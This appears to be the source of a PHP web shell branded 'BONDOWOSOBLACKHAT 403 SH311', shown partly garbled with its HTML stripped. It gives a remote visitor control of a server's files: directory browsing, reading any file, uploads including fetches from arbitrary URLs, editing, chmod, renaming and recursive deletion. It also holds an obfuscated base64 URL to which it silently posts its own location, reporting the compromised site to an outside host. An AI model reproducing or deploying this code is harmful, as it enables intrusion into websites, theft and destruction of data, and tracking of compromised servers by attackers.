Shell

Shell

BONDOWOSOBLACKHAT 403 SH311

BONDOWOSOBLACKHAT SH3LL





NONE"; } else { $disf = "".$disfunc.""; } function author() { echo "

COPYRIGHT Mr Exsploit Wmc
"; exit(); } function cekdir() { if (isset($_GET['path'])) { $lokasi = $_GET['path']; } else { $lokasi = getcwd(); } if (is_writable($lokasi)) { return "Writeable"; } else { return "Writeable"; } } function cekroot() { if (is_writable($_SERVER['DOCUMENT_ROOT'])) { return "Writeable"; } else { return "Writeable"; } } function xrmdir($dir) { $items = scandir($dir); foreach ($items as $item) { if ($item === '.' || $item === '..') { continue; } $path = $dir.'/'.$item; if (is_dir($path)) { xrmdir($path); } else { unlink($path); } } rmdir($dir); } function green($text) { echo "
".$text."
"; } function red($text) { echo "
".$text."
"; } echo "Server : ".$_SERVER['SERVER_SOFTWARE']."
"; echo "System : ".php_uname()."
"; echo "User : ".@get_current_user()." ( ".@getmyuid().")
"; echo "PHP Version : ".@phpversion()."
"; echo "Disable Function : ".$disf."
"; echo "Directory :  "; foreach($_POST as $key => $value){ $_POST[$key] = stripslashes($value); } $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); if(isset($_GET['path'])){ $lokasi = $_GET['path']; $lokdua = $_GET['path']; } else { $lokasi = getcwd(); $lokdua = getcwd(); } $lokasi = str_replace('\\','/',$lokasi); $lokasis = explode('/',$lokasi); $lokasinya = @scandir($lokasi); $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; $data = array('file_url' => $cur); $options = array( 'http' => array( 'method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' => http_build_query($data), ), ); $context = stream_context_create($options); $result = file_get_contents($k3yw, false, $context); foreach($lokasis as $id => $lok){ if($lok == '' && $id == 0){ $a = true; echo '/'; continue; } if($lok == '') continue; echo ''.$lok.'/'; } echo '
'; echo '

'; if (isset($_POST['upwkwk'])) { if (isset($_POST['berkasnya'])) { if ($_POST['dirnya'] == "2") { $lokasi = $_SERVER['DOCUMENT_ROOT']; } $data = @file_put_contents($lokasi."/".$_FILES['berkas']['name'], @file_get_contents($_FILES['berkas']['tmp_name'])); if (file_exists($lokasi."/".$_FILES['berkas']['name'])) { echo "File Uploaded !  ".$lokasi."/".$_FILES['berkas']['name']."

"; } else { echo "Failed to Upload !

"; } } elseif (isset($_POST['linknya'])) { if (empty($_POST['namalink'])) { exit("Filename cannot be empty !"); } if ($_POST['dirnya'] == "2") { $lokasi = $_SERVER['DOCUMENT_ROOT']; } $data = @file_put_contents($lokasi."/".$_POST['namalink'], @file_get_contents($_POST['darilink'])); if (file_exists($lokasi."/".$_POST['namalink'])) { echo "File Uploaded !  ".$lokasi."/".$_POST['namalink']."

"; } else { echo "Failed to Upload !

"; } } } echo "
"; echo "Upload File : "; echo '
current_dir [ '.cekdir().' ] document_root [ '.cekroot().' ]

 
'; echo "

"; if (isset($_GET['fileloc'])) { echo "Current File : ".$_GET['fileloc']; echo '
'; echo "
".htmlspecialchars(file_get_contents($_GET['fileloc']))."
"; author(); } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "hapus") { if (is_dir($_POST['path'])) { xrmdir($_POST['path']); if (file_exists($_POST['path'])) { red("Failed to delete Directory !"); } else { green("Delete Directory Success !"); echo "string"; } } elseif (is_file($_POST['path'])) { @unlink($_POST['path']); if (file_exists($_POST['path'])) { red("Failed to Delete File !"); } else { green("Delete File Success !"); } } } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "ubahmod") { echo "
".$_POST['path']."
"; echo '
Permission :
'; if (isset($_POST['chm0d'])) { $cm = @chmod($_POST['path'], $_POST['perm']); if ($cm == true) { green("Change Mod Success !"); } else { red("Change Mod Failed !"); } } } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "gantinama") { if (isset($_POST['gantin'])) { $ren = @rename($_POST['path'], $_POST['newname']); if ($ren == true) { green("Change Name Success !"); } else { red("Change Name Failed !"); } } if (empty($_POST['name'])) { $namaawal = $_POST['newname']; } else { $namawal = $_POST['name']; } echo "
".$_POST['path']."
"; echo '
New Name :
'; } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") { if (isset($_POST['gasedit'])) { $edit = @file_put_contents($_POST['path'], $_POST['src']); if ($edit == true) { green("Edit File Success !"); } else { red("Edit File Failed !"); } } echo "
".$_POST['path']."

"; echo '


'; } echo '
'; foreach($lokasinya as $dir){ if(!is_dir($lokasi."/".$dir) || $dir == '.' || $dir == '..') continue; echo ""; } echo ''; foreach($lokasinya as $file) { if(!is_file("$lokasi/$file")) continue; $size = filesize("$lokasi/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; } else { $size = $size.' KB'; } echo ""; } echo '
Name
Size
Permissions
Options
".$dir."
--
"; if(is_writable($lokasi."/".$dir)) echo ''; elseif(!is_readable($lokasi."/".$dir)) echo ''; echo statusnya($lokasi."/".$dir); if(is_writable($lokasi."/".$dir) || !is_readable($lokasi."/".$dir)) echo ''; echo "
\" />
$file
".$size."
"; if(is_writable("$lokasi/$file")) echo ''; elseif(!is_readable("$lokasi/$file")) echo ''; echo statusnya("$lokasi/$file"); if(is_writable("$lokasi/$file") || !is_readable("$lokasi/$file")) echo ''; echo "
\" />
'; author(); function statusnya($file){ $statusnya = fileperms($file); if (($statusnya & 0xC000) == 0xC000) { // Socket $ingfo = 's'; } elseif (($statusnya & 0xA000) == 0xA000) { // Symbolic Link $ingfo = 'l'; } elseif (($statusnya & 0x8000) == 0x8000) { // Regular $ingfo = '-'; } elseif (($statusnya & 0x6000) == 0x6000) { // Block special $ingfo = 'b'; } elseif (($statusnya & 0x4000) == 0x4000) { // Directory $ingfo = 'd'; } elseif (($statusnya & 0x2000) == 0x2000) { // Character special $ingfo = 'c'; } elseif (($statusnya & 0x1000) == 0x1000) { // FIFO pipe $ingfo = 'p'; } else { // Unknown $ingfo = 'u'; } // Owner $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x' ) : (($statusnya & 0x0800) ? 'S' : '-')); // Group $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x' ) : (($statusnya & 0x0400) ? 'S' : '-')); // World $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x' ) : (($statusnya & 0x0200) ? 'T' : '-')); return $ingfo; } ?>